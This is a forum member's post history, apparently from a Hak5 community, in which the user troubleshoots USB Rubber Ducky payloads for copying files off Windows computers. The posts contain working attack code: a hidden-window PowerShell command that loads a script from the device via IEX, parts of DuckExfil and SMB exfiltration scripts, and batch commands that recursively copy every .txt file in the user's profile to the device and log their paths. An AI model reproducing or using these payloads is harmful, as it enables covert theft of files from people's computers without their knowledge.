Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

Everything posted by lucaM

  1. Thank you for your explanation. I report the steps I did after the mini changes. - The USB Rubber Ducky label is "_" - I created the "loot folder on ducky" folder and the "payloads" folder inside the USB Rubber Ducky - Inside the "payloads" folder I inserted the file "DuckExfil.ps1", code below: # This is DuckExfil.ps1 function Invoke-DuckExfil { $exfilfolder = "$env:userprofile\Documents\" $duckDrive = (gwmi -class win32_volume -f {label='_'}).Name $payloaddir = "payloads\" $duckpayloads = join-path $duckDrive $payloaddir $duckloot = join-path
  2. I look at the code to try to understand how it works. In my ignorance I think I have to change something to make it work. Unfortunately, even after the change does not work. I modified this part: #Get the smbexfil script and run it with parameters. IEX (gc (join-path $duckpayloads "Invoke-SMBExfil.ps1") -encoding String | Out-String) Invoke-SMBExfil $exfilfolder $duckloot $filetypes With this: #Get the smbexfil script and run it with parameters. IEX (gc (join-path $duckpayloads "Invoke-DuckExfil.ps1") -encoding String | Out-String) Invoke-DuckExfil $exfilfolder $du
  3. Thanks for your help. I created (inside the micro sd for the USB Rubber Duck) the payloads folder, inside this folder I inserted the file DuckExfil.ps1. I created the "inject.bin" file obtained from the code STRING powershell -NoP -W hidden -C {$duck=(join-path (gwmi -class win32_volume -f "label='-'").Name "payloads\DuckExfil.ps1");IEX (gc $duck -encoding String | Out-String);Invoke-DuckExfil} I transferred the files inside the USB Rubber Duck. Connect the USB Rubber Duck to the PC, it opens "run windows" with relative string of code, opens the powershell and minimizes.
  4. I managed to solve, I did a lot of tests and tried between codes, at the end something worked :-) Still inside the e.cmd file I entered this code REM Create folder to receive files mkdir %dst%\txt REM Copy (inside the newly created folder) all the files present in the current user's PC, for that specific extension cd %USERPROFILE% & FORFILES /S /M *.tx* /C "cmd /c xcopy /Y @path %dst%\txt" REM Creates a log file containing the paths of the files saved in the folder. cd %USERPROFILE% & FORFILES /S /M *.tx* /C "cmd /c echo @path" >> %dst%\txt.log" All the content of e
  5. Hi PoSHMagiC0de and bg-wa Thanks for your answers. I looked at the code of PoSHMagiC0de, if I misunderstood, refers to this piece of code: EXAMPLE Invoke-SMBExfil -targetfolder "$env:userprofile\Documents" -destUNC "\\\foldershare\targetfolder" -filenames @("*.gif","*.jpg","*.docx","*.xlsx") I tried to put these codes inside the e.cmd file, but they do not work, I'm definitely missing something "$env:userprofile\\Documents\" @(\"*.docx\",\"*.pdf\",\"*.jpg\",\"*.gif\",\"*.xlsx\")" "$env:userprofile\\Documents\" (\"*.docx\",\"*.pdf\",\"*.jpg\",\"*.gif\",\"*.xlsx\")"
  6. Hello everyone, my name is Luca I am new to the forum, I am writing for the first time to ask for help, I am not an expert in programming language and I would like to simplify the palyloads that I modified starting from that of hak5. I followed the instructions below, and everything works correctly: https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained - I used ducky-flasher, I chose the original "Twin Duck" firmware. - Inside the micro sd I created the folder "slurp", the files "d.cmd e.cmd i.vbs", and the file "inject.bi
  • Create New...